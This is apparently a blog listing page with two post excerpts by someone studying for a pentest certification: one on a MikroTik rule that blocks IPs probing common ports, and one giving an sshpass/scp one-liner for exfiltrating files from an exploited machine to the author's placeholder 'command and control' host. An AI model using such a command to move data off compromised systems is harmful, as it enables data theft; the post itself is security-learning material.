Blocking Bad Guys

In my last blog post I went over some firewall security rules that I have setup. Since then I’ve been thinking about how I can continue to increase securtity of my home network. What I came up with was to block traffic from any IP that visits my common ports. I created a filter rule that looks for people checking ports 21,22,23,25,53,110,111,135,139,143,445,993,995,1723,3389,5900 over the WAN interface. The rule then adds the user to a bad-guys list for a week, all traffic is dropped from bad-guys list. [Read More]

Mikrotik Firewall Security

As I continue to work towards my pentest+ certification I am continually making scripts along the way and improving security. I first started working on a way to exfiltrate data if I exploited a machine. I want to easily send data to a command and control center if you will. The one-liner I came up with (I love one-liners!) is sshpass -p SCP_PASSWORD scp -P 22222 file.txt scpuser@HOME_PUBLIC_IP:/home/scpuser. This command uses sshpass to pass off my pass when trying to authenticate the scp command, I use -P 222222 because for the port I am using, file. [Read More]